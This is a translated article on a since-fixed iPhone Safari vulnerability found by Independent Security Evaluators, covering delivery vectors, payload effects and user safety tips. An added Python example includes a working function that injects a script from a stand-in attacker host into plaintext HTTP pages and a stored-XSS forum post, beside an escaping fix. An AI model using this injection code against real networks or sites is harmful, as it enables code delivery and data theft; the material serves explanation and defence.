Note: Below is a translation of the article “Exploiting the iPhone”, which reveals some details of the recently discovered (and since fixed) vulnerabilities in the iPhone and offers a few practical tips for avoiding such attacks in the future.
Update: Apple has released an update that fixes the discovered vulnerabilities. Details of how one of the vulnerabilities was found are described on our blog.
Details at BlackHat: Charlie Miller presented the details of the exploit at BlackHat, which took place in Las Vegas on August 2. The presentation is also available at this address.
Preliminary technical description: a preliminary paper describing the attack is available at this address. The full version was expected after August 2 (translator's note: apparently it was never posted).
An article in the New York Times: the story of the work was published in the New York Times.
Introduction
Shortly after the iPhone was released, a group of security researchers from Independent Security Evaluators decided to test how difficult it would be for a remote attacker to gain access to the private information stored on the device. Within two weeks of part-time work, we were able to find a vulnerability, develop a toolchain for working with the iPhone's architecture (some of its utilities were taken from the #iphone-dev community) and create a proof-of-concept exploit that could transfer files from the user's iPhone to a remote attacker. We notified Apple of the discovered vulnerability and proposed a fix for it. Apple is currently reviewing this proposal (translator's note: as stated above, Apple did release an official update).
A member of our group, Charlie Miller, presented full details of finding the vulnerability and building the exploit at BlackHat on August 2. This site will be updated to reflect those details; until then, only general information about the iPhone exploit is published here.
How it works
The exploit is delivered through a malicious web page opened in Safari on the iPhone. There are several ways an attacker could get a victim to open such a page. Consider the following examples.
- The attacker controls a wireless access point. Since the iPhone recognizes access points by name (SSID), it is enough for the user to be within range of an access point controlled by the attacker: if it has the same name (and encryption type) as an access point the user has previously trusted and added, the iPhone joins the malicious access point automatically. This lets the attacker add the exploit code to any page the user views, simply by replacing the requested page with one containing the exploit.
- Insufficient input handling on a forum. If the forum software does not adequately sanitize data submitted by users, they can embed potentially malicious code in their posts. An attacker can thereby cause the exploit to run in the iPhone's browser whenever the page with that post is opened. (This would, however, require some minor changes to our proof-of-concept exploit.)
- A link sent by e-mail or SMS. If an attacker can trick the user into opening a website, the attacker simply places the exploit code on the front page of that site.
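The first two delivery vectors above, modelled in Python as an added example. This is not code from the original page or from ISE: the sample HTTP responses, the forum post and the URL attacker.example are constructed, and the real exploit page and payload are not reproduced. The first function does what a rogue access point's transparent proxy does to any page fetched over plaintext HTTP: it inserts a script reference into the HTML body and corrects Content-Length so the client does not truncate or stall on the altered response. It only works on HTTP, not HTTPS, since TLS hides and integrity-protects the body from anyone in the middle. The second pair shows the forum bug beside its fix: rendering a user's post verbatim versus HTML-escaping it before output.

```python
"""Delivery vectors 1 and 2 from the text, modelled on constructed data.

Added example, not code from the original page or from ISE. The HTTP
responses, the forum post and attacker.example below are constructed.
"""
import html
import re

EXPLOIT_URL = "http://attacker.example/exploit.js"   # hypothetical host


# --- Vector 1: rogue access point rewriting plaintext HTTP -----------------

def _http_response(content_type: str, body: bytes) -> bytes:
    """Build a minimal HTTP/1.1 response (helper for the constructed samples)."""
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return head.encode() + body


# Constructed samples of what a transparent proxy on the rogue AP sees.
SAMPLE_HTML_RESPONSE = _http_response(
    "text/html; charset=utf-8",
    b"<html><head><title>News</title></head><body>Hello</body></html>",
)
SAMPLE_JSON_RESPONSE = _http_response("application/json", b'{"ok": true}')


def inject_into_http_response(raw: bytes, script_url: str) -> bytes:
    """Return `raw` with a <script> tag inserted into its HTML body.

    This is the rewrite an attacker who controls the network can apply to any
    page the victim requests over plaintext HTTP. Non-HTML and incomplete
    responses pass through untouched. TLS (https://) defeats it entirely: the
    proxy can neither read nor alter the body.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw                      # no header/body boundary: leave it alone
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw
    tag = f'<script src="{script_url}"></script>'.encode()
    new_body, n = re.subn(rb"</body>", lambda m: tag + m.group(0), body,
                          count=1, flags=re.IGNORECASE)
    if n == 0:
        new_body = body + tag           # no closing tag: append; browsers still run it
    # Fix the framing so the client does not wait on or truncate the body.
    new_lines = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(new_body)).encode()
        new_lines.append(line)
    return b"\r\n".join(new_lines) + b"\r\n\r\n" + new_body


# --- Vector 2: forum that does not sanitise user posts ---------------------

# Constructed attacker post: the exploit is hosted elsewhere and pulled in by reference.
ATTACKER_POST = f'Nice phone! <script src="{EXPLOIT_URL}"></script>'


def render_post_unsafe(author: str, body: str) -> str:
    """The bug: user text is concatenated straight into the page (stored XSS)."""
    return f'<div class="post"><b>{author}</b>: {body}</div>'


def render_post_safe(author: str, body: str) -> str:
    """The fix: HTML-escape everything that came from a user before output."""
    return f'<div class="post"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def contains_active_content(rendered: str) -> bool:
    """Crude check: does the fragment still carry a script tag or an inline
    event handler? Adequate for the constructed samples here; a real review
    would use an HTML parser or an allow-list sanitiser instead of a regex."""
    return re.search(r"<script\b|<\w+[^>]*\son\w+\s*=", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(inject_into_http_response(SAMPLE_HTML_RESPONSE, EXPLOIT_URL).decode())
    print(render_post_unsafe("mallory", ATTACKER_POST))
    print(render_post_safe("mallory", ATTACKER_POST))
```

Run it directly to see the tampered response and the two renderings of the same post side by side; the escaped version shows `&lt;script` as literal text and never reaches the script engine.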
When Safari on the iPhone opens the malicious page, the arbitrary code carried by the exploit runs with administrative privileges. In our proof of concept, this code reads the SMS log, the address book, the call history and the voicemail data, and then sends all of it to the attacker. The payload could, however, be any code at all and could use any feature of the iPhone: for example, it could send the user's e-mail passwords, send text messages that subscribe the user to premium services, or make an audio recording and transmit it to the attacker.
Tips
We have notified Apple of this vulnerability and proposed a fix for it. We hope they will include it in a future iPhone update. To protect yourself from this and similar vulnerabilities in the future, follow these rules (on the iPhone and on other devices alike).
- Only visit sites you trust. If you do not visit the attacker's site, you remove one of the ways the attack can reach you.
- Use only Wi-Fi networks you trust. If attackers control your Internet connection, they can add malicious code to any site you visit.
- Do not open links from e-mails. Many of the currently known viruses send links to malicious websites in e-mails that may appear to come from trusted friends.
Related Links
I thank those who took the time to read the translation. I would welcome any comments. If you have additional information on this topic, please share it. Thank you for your attention.